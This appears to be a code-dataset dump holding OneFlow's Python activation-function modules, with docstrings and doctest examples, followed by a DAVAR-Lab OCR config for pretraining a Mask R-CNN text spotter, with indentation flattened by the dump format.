class Hardsigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Hardsigmoid}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
1 & \text{ if } x \ge +3 \\
\frac{x}{6} + \frac{1}{2} & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardsigmoid = flow.nn.Hardsigmoid()
>>> out = hardsigmoid(input).numpy()
>>> print(out)
[0.41666666 0.5 0.5833333 ]
"""
@oneflow_export("nn.Softmax")
@experimental_api
@oneflow_export("softmax")
@register_tensor_op("softmax")
@experimental_api
def softmax_op(tensor, dim=None):
r"""Applies the Softmax function to an n-dimensional input Tensor
rescaling them so that the elements of the n-dimensional output Tensor
lie in the range [0,1] and sum to 1.
Softmax is defined as:
.. math::
\text{Softmax}(x_{i}) = \frac{\exp(x_i)}{\sum_j \exp(x_j)}
    When the input Tensor is a sparse tensor, the unspecified
    values are treated as ``-inf``.
Shape:
        - Input: :math:`(*)` where `*` means any number of additional
          dimensions
- Output: :math:`(*)`, same shape as the input
Returns:
a Tensor of the same dimension and shape as the input with
values in the range [0, 1]
Args:
dim (int): A dimension along which Softmax will be computed (so every slice
along dim will sum to 1).
For example:
.. code-block:: python
        import oneflow.experimental as flow
import numpy as np
m = flow.nn.Softmax(dim = 2)
x = flow.Tensor(
np.array(
[[[[-0.46716809, 0.40112534, 0.61984003],
[-1.31244969, -0.42528763, 1.47953856]]],
[[[ 1.02978742, -0.49383053, 1.88214159],
[ 1.35351622, -1.46251285, -1.40751374]]]]
)
)
y = m(x)
# [[[[0.6995764 0.6955959 0.29740235]
# [0.3004236 0.30440408 0.7025977 ]]]
# [[[0.4197673 0.7248568 0.96407217]
# [0.58023274 0.27514324 0.03592779]]]]
"""
return Softmax(dim)(tensor)
@oneflow_export("nn.LogSoftmax")
@experimental_api
class LogSoftmax(Module):
r"""Applies the :math:`\log(\text{Softmax}(x))` function to an n-dimensional
input Tensor.
The LogSoftmax formulation can be simplified as:
.. math::
\text{LogSoftmax}(x_{i}) = \log\left(\frac{\exp(x_i) }{ \sum_j \exp(x_j)} \right)
Args:
dim (int): A dimension along which LogSoftmax will be computed.
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
m = flow.nn.LogSoftmax(dim=1)
x = flow.Tensor(
np.array(
[[ 0.4296, -1.1957, 2.5463],
[ 1.2552, -1.5747, 0.6923]]
)
)
y = m(x)
# [[-2.251349 -3.8766491 -0.13464898]
# [-0.48770458 -3.3176045 -1.0506046 ]]
"""
@oneflow_export("nn.LogSigmoid")
@experimental_api
class LogSigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> logsigmoid = flow.nn.LogSigmoid()
>>> out = logsigmoid(input).numpy()
>>> print(out)
[-0.974077 -0.6931472 -0.47407696]
"""
@oneflow_export("nn.Softplus")
@experimental_api
class Softplus(Module):
r"""Applies the element-wise function:
.. math::
\text{Softplus}(x) = \frac{1}{\beta} * \log(1 + \exp(\beta * x))
SoftPlus is a smooth approximation to the ReLU function and can be used
to constrain the output of a machine to always be positive.
For numerical stability the implementation reverts to the linear function
when :math:`input \times \beta > threshold`.
Args:
beta: the :math:`\beta` value for the Softplus formulation. Default: 1
threshold: values above this revert to a linear function. Default: 20
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> softplus = flow.nn.Softplus()
>>> out = softplus(input).numpy()
>>> print(out)
[0.474077 0.6931472 0.974077 ]
"""
@oneflow_export("nn.Hardswish")
@experimental_api
class Hardswish(Module):
r"""Applies the hardswish function, element-wise, as described in the paper:
`Searching for MobileNetV3`_.
.. math::
\text{Hardswish}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
x & \text{ if } x \ge +3 \\
x*(x+3)/6 & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardswish = flow.nn.Hardswish()
>>> out = hardswish(input).numpy()
>>> print(out)
[-0.20833333 0. 0.29166666]
.. _`Searching for MobileNetV3`:
https://arxiv.org/abs/1905.02244
"""
@oneflow_export("nn.Hardtanh")
@experimental_api
class Hardtanh(Module):
r"""
Applies the HardTanh function element-wise
HardTanh is defined as:
.. math::
\text{HardTanh}(x) = \begin{cases}
1 & \text{ if } x > 1 \\
-1 & \text{ if } x < -1 \\
x & \text{ otherwise } \\
\end{cases}
The range of the linear region :math:`[-1, 1]` can be adjusted using
:attr:`min_val` and :attr:`max_val`.
Args:
min_val: minimum value of the linear region range. Default: -1
max_val: maximum value of the linear region range. Default: 1
inplace: can optionally do the operation in-place. Default: ``False``
Keyword arguments :attr:`min_value` and :attr:`max_value`
have been deprecated in favor of :attr:`min_val` and :attr:`max_val`.
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.Hardtanh()
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 1. 1. ]
"""
@oneflow_export("nn.LeakyReLU")
@experimental_api
class LeakyReLU(Module):
r"""Applies the element-wise function:
.. math::
\text{LeakyReLU}(x) = \max(0, x) + \text{negative_slope} * \min(0, x)
or
.. math::
        \text{LeakyReLU}(x) = \begin{cases}
x, & \text{ if } x \geq 0 \\
\text{negative_slope} \times x, & \text{ otherwise }
\end{cases}
Args:
negative_slope: Controls the angle of the negative slope. Default: 1e-2
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.LeakyReLU(0.1)
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 3. 4. ]
"""
if __name__ == "__main__":
import doctest
doctest.testmod()
| 25.751634 | 89 | 0.544036 | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import warnings
import oneflow as flow
import oneflow._oneflow_internal
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export, experimental_api
from oneflow.python.framework.tensor import register_tensor_op
from typing import Optional
def _softmax_need_transpose(x, axis):
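    """Decide whether softmax along `axis` requires a transpose.
    The underlying "softmax" op always reduces over the last dimension, so
    when `axis` is not the last one we swap it with the last axis. The
    returned permutation is its own inverse, so applying it a second time
    restores the original layout.
    """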
assert type(axis) is int
dim_num = len(x.shape)
assert dim_num >= 2
if axis < 0:
axis += dim_num
assert axis >= 0
assert axis < dim_num
need_transpose = False
permute = list(range(dim_num))
if axis != dim_num - 1:
need_transpose = True
permute[axis] = permute[-1]
permute[-1] = axis
return need_transpose, permute
@oneflow_export("nn.ReLU")
@experimental_api
class ReLU(Module):
r"""Applies the rectified linear unit function element-wise:
:math:`\text{ReLU}(x) = (x)^+ = \max(0, x)`
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import oneflow.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> relu = flow.nn.ReLU()
>>> ndarr = np.asarray([1, -2, 3])
>>> x = flow.Tensor(ndarr)
>>> relu(x).numpy()
array([1., 0., 3.], dtype=float32)
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("relu").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.ReLU6")
@experimental_api
class ReLU6(Module):
r"""Applies the element-wise function:
.. math::
\text{Relu6}(x) = \begin{cases}
6 & \text{ if } x > 6 \\
0 & \text{ if } x < 0 \\
x & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> relu6 = flow.nn.ReLU6()
>>> out = relu6(input).numpy()
>>> print(out)
[0. 0. 0.5]
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = (
flow.builtin_op("hardtanh")
.Input("in")
.Attr("min_val", 0.0)
.Attr("max_val", 6.0)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Tanh")
@experimental_api
class Tanh(Module):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-1, 0, 1]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> tanh = flow.nn.Tanh()
>>> out = tanh(input).numpy()
>>> print(out)
[-0.7615942 0. 0.7615942]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("tanh").Input("x").Output("y").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("tanh")
@register_tensor_op("tanh")
@experimental_api
def tanh_op(x):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
        import oneflow.experimental as flow
import numpy as np
x = np.array([-1, 0, 1]).astype(np.float32)
input = flow.Tensor(x)
tanh = flow.nn.Tanh()
out = tanh(input).numpy()
# out [-0.7615942 0. 0.7615942]
"""
return Tanh()(x)
@oneflow_export("nn.ELU")
@experimental_api
class ELU(Module):
r"""Applies the element-wise function:
.. math::
\text{ELU}(x) = \begin{cases}
x & \text{ if } x \gt 0 \\
\alpha*(exp(x)-1) & \text{ if } x \le 0 \\
\end{cases}
Args:
alpha: the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> elu = flow.nn.ELU()
>>> out = elu(input).numpy()
>>> print(out)
[-0.39346933 0. 0.5 ]
"""
def __init__(self, alpha: float = 1.0, inplace: bool = False):
super().__init__()
self._op = (
flow.builtin_op("elu")
.Input("in")
.Attr("alpha", alpha)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.GELU")
@experimental_api
class GELU(Module):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("gelu").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("gelu")
@register_tensor_op("gelu")
@experimental_api
def gelu_op(x):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
return GELU()(x)
@oneflow_export("nn.Sigmoid")
@experimental_api
class Sigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
m = flow.nn.Sigmoid() # or y = flow.sigmoid(x)
y = m(x)
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("sigmoid").Input("in").Output("out").Build()
def forward(self, x):
return self._op(x)[0]
@oneflow_export("sigmoid")
@register_tensor_op("sigmoid")
@experimental_api
def sigmoid_op(x):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
y = x.sigmoid()
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
return Sigmoid()(x)
@oneflow_export("nn.Hardsigmoid")
@experimental_api
class Hardsigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Hardsigmoid}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
1 & \text{ if } x \ge +3 \\
\frac{x}{6} + \frac{1}{2} & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardsigmoid = flow.nn.Hardsigmoid()
>>> out = hardsigmoid(input).numpy()
>>> print(out)
[0.41666666 0.5 0.5833333 ]
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("hardsigmoid").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Softmax")
@experimental_api
class Softmax(Module):
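    """Softmax over dimension `dim` (defaults to the last dimension).
    See :func:`softmax_op` below for the formula and an example. The target
    axis is transposed to the end when needed, because the builtin "softmax"
    op always reduces over the last dimension.
    """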
def __init__(self, dim: Optional[int] = None):
super().__init__()
self.axis = -1 if dim is None else dim
self._op = flow.builtin_op("softmax").Input("in").Output("out").Build()
self._transpose_op = (
flow.builtin_op("transpose")
.Input("input")
.Output("output")
.Attr("perm", [])
.Build()
)
def forward(self, x):
need_transpose, permute = _softmax_need_transpose(x, self.axis)
if need_transpose:
x = self._transpose_op(x, perm=permute)[0]
res = self._op(x)[0]
if need_transpose:
res = self._transpose_op(res, perm=permute)[0]
return res
@oneflow_export("softmax")
@register_tensor_op("softmax")
@experimental_api
def softmax_op(tensor, dim=None):
r"""Applies the Softmax function to an n-dimensional input Tensor
rescaling them so that the elements of the n-dimensional output Tensor
lie in the range [0,1] and sum to 1.
Softmax is defined as:
.. math::
\text{Softmax}(x_{i}) = \frac{\exp(x_i)}{\sum_j \exp(x_j)}
    When the input Tensor is a sparse tensor, the unspecified
    values are treated as ``-inf``.
Shape:
        - Input: :math:`(*)` where `*` means any number of additional
          dimensions
- Output: :math:`(*)`, same shape as the input
Returns:
a Tensor of the same dimension and shape as the input with
values in the range [0, 1]
Args:
dim (int): A dimension along which Softmax will be computed (so every slice
along dim will sum to 1).
For example:
.. code-block:: python
        import oneflow.experimental as flow
import numpy as np
m = flow.nn.Softmax(dim = 2)
x = flow.Tensor(
np.array(
[[[[-0.46716809, 0.40112534, 0.61984003],
[-1.31244969, -0.42528763, 1.47953856]]],
[[[ 1.02978742, -0.49383053, 1.88214159],
[ 1.35351622, -1.46251285, -1.40751374]]]]
)
)
y = m(x)
# [[[[0.6995764 0.6955959 0.29740235]
# [0.3004236 0.30440408 0.7025977 ]]]
# [[[0.4197673 0.7248568 0.96407217]
# [0.58023274 0.27514324 0.03592779]]]]
"""
return Softmax(dim)(tensor)
@oneflow_export("nn.LogSoftmax")
@experimental_api
class LogSoftmax(Module):
r"""Applies the :math:`\log(\text{Softmax}(x))` function to an n-dimensional
input Tensor.
The LogSoftmax formulation can be simplified as:
.. math::
\text{LogSoftmax}(x_{i}) = \log\left(\frac{\exp(x_i) }{ \sum_j \exp(x_j)} \right)
Args:
dim (int): A dimension along which LogSoftmax will be computed.
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
m = flow.nn.LogSoftmax(dim=1)
x = flow.Tensor(
np.array(
[[ 0.4296, -1.1957, 2.5463],
[ 1.2552, -1.5747, 0.6923]]
)
)
y = m(x)
# [[-2.251349 -3.8766491 -0.13464898]
# [-0.48770458 -3.3176045 -1.0506046 ]]
"""
def __init__(
self, dim: Optional[int] = 1,
):
super().__init__()
self.dim = dim
self._op = (
flow.builtin_op("transpose")
.Input("input")
.Output("output")
.Attr("perm", [])
.Build()
)
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, "dim"):
self.dim = None
def forward(self, x):
need_transpose, permute = _softmax_need_transpose(x, self.dim)
if need_transpose:
x = self._op(x, perm=permute)[0]
x = x.softmax()
res = x.log()
if need_transpose:
res = self._op(res, perm=permute)[0]
return res
def extra_repr(self):
return "dim={dim}".format(dim=self.dim)
@oneflow_export("nn.LogSigmoid")
@experimental_api
class LogSigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> logsigmoid = flow.nn.LogSigmoid()
>>> out = logsigmoid(input).numpy()
>>> print(out)
[-0.974077 -0.6931472 -0.47407696]
"""
def __init__(self):
super().__init__()
def forward(self, x):
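        # Computed as log(sigmoid(x)) in two steps; note this can lose
        # precision for large negative x, where a fused logsigmoid kernel
        # would be more numerically stable.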
sigmoid_res = flow.experimental.sigmoid(x)
res = flow.experimental.log(sigmoid_res)
return res
@oneflow_export("nn.Softplus")
@experimental_api
class Softplus(Module):
r"""Applies the element-wise function:
.. math::
\text{Softplus}(x) = \frac{1}{\beta} * \log(1 + \exp(\beta * x))
SoftPlus is a smooth approximation to the ReLU function and can be used
to constrain the output of a machine to always be positive.
For numerical stability the implementation reverts to the linear function
when :math:`input \times \beta > threshold`.
Args:
beta: the :math:`\beta` value for the Softplus formulation. Default: 1
threshold: values above this revert to a linear function. Default: 20
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> softplus = flow.nn.Softplus()
>>> out = softplus(input).numpy()
>>> print(out)
[0.474077 0.6931472 0.974077 ]
"""
def __init__(self, beta: int = 1, threshold: int = 20):
super().__init__()
self.beta = beta
self.threshold = threshold
def forward(self, x):
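        # Revert to the identity for x * beta > threshold (see docstring);
        # this avoids overflow in exp(beta * x) for large inputs.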
return flow.experimental.where(
x * self.beta > self.threshold,
x,
1
/ self.beta
* flow.experimental.log(1.0 + flow.experimental.exp(self.beta * x)),
)
@oneflow_export("nn.Hardswish")
@experimental_api
class Hardswish(Module):
r"""Applies the hardswish function, element-wise, as described in the paper:
`Searching for MobileNetV3`_.
.. math::
\text{Hardswish}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
x & \text{ if } x \ge +3 \\
x*(x+3)/6 & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardswish = flow.nn.Hardswish()
>>> out = hardswish(input).numpy()
>>> print(out)
[-0.20833333 0. 0.29166666]
.. _`Searching for MobileNetV3`:
https://arxiv.org/abs/1905.02244
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("hardswish").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Hardtanh")
@experimental_api
class Hardtanh(Module):
r"""
Applies the HardTanh function element-wise
HardTanh is defined as:
.. math::
\text{HardTanh}(x) = \begin{cases}
1 & \text{ if } x > 1 \\
-1 & \text{ if } x < -1 \\
x & \text{ otherwise } \\
\end{cases}
The range of the linear region :math:`[-1, 1]` can be adjusted using
:attr:`min_val` and :attr:`max_val`.
Args:
min_val: minimum value of the linear region range. Default: -1
max_val: maximum value of the linear region range. Default: 1
inplace: can optionally do the operation in-place. Default: ``False``
Keyword arguments :attr:`min_value` and :attr:`max_value`
have been deprecated in favor of :attr:`min_val` and :attr:`max_val`.
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.Hardtanh()
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 1. 1. ]
"""
def __init__(
self,
min_val: float = -1,
max_val: float = 1,
inplace: bool = False,
min_value: Optional[float] = None,
max_value: Optional[float] = None,
):
super().__init__()
if min_value is not None:
warnings.warn(
"keyword argument min_value is deprecated and rename to min_val"
)
min_val = min_value
if max_value is not None:
warnings.warn(
"keyword argument max_value is deprecated and rename to max_val"
)
max_val = max_value
self._op = (
flow.builtin_op("hardtanh")
.Input("in")
.Attr("min_val", min_val)
.Attr("max_val", max_val)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.LeakyReLU")
@experimental_api
class LeakyReLU(Module):
r"""Applies the element-wise function:
.. math::
\text{LeakyReLU}(x) = \max(0, x) + \text{negative_slope} * \min(0, x)
or
.. math::
        \text{LeakyReLU}(x) = \begin{cases}
x, & \text{ if } x \geq 0 \\
\text{negative_slope} \times x, & \text{ otherwise }
\end{cases}
Args:
negative_slope: Controls the angle of the negative slope. Default: 1e-2
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
        - Input: :math:`(N, *)` where `*` means any number of additional
          dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.LeakyReLU(0.1)
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 3. 4. ]
"""
def __init__(self, negative_slope: float = 1e-2, inplace: bool = False):
super().__init__()
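        # The builtin "leaky_relu" op names its slope attribute "alpha", so
        # negative_slope is forwarded under that name.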
self._op = (
flow.builtin_op("leaky_relu")
.Input("x")
.Attr("alpha", negative_slope)
.Output("y")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
if __name__ == "__main__":
import doctest
doctest.testmod()
| 4,998 | 1 | 854 |
b94570549fff0f323fca932142442f9e2286a38b | 1,362 | py | Python | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | """
####################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : mask_rcnn_spotter_pretrain.py
# Abstract : Model settings for Mask R-CNN spotter end-to-end pretraining on SynthText synthetic data.
# Current Version: 1.0.0
# Date : 2020-06-24
######################################################################################################
"""
_base_ = './__base__.py'
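# NOTE: mmdetection-style config inheritance -- only the fields below override
# the defaults defined in __base__.py (model, pipelines, schedules, etc.).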
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(
ann_file=[
'/path/to/datalist/synthtext_80w.json',
],
img_prefix=[
'/path/to/SynthText/',
]
),
val=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
),
test=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
)
)
optimizer=dict(lr=1e-3)
lr_config = dict(step=[2, 3])
runner = dict(max_epochs=4)
checkpoint_config = dict(interval=1, filename_tmpl='checkpoint/res50_ete_pretrain_epoch_{}.pth')
work_dir = '/path/to/workspace/log/'
load_from = '/path/to/Model_Zoo/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth'
| 34.923077 | 102 | 0.553598 | """
####################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : mask_rcnn_spotter_pretrain.py
# Abstract : Model settings for Mask R-CNN spotter end-to-end pretraining on SynthText synthetic data.
# Current Version: 1.0.0
# Date : 2020-06-24
######################################################################################################
"""
_base_ = './__base__.py'
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(
ann_file=[
'/path/to/datalist/synthtext_80w.json',
],
img_prefix=[
'/path/to/SynthText/',
]
),
val=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
),
test=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
)
)
optimizer=dict(lr=1e-3)
lr_config = dict(step=[2, 3])
runner = dict(max_epochs=4)
checkpoint_config = dict(interval=1, filename_tmpl='checkpoint/res50_ete_pretrain_epoch_{}.pth')
work_dir = '/path/to/workspace/log/'
load_from = '/path/to/Model_Zoo/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth'
| 0 | 0 | 0 |
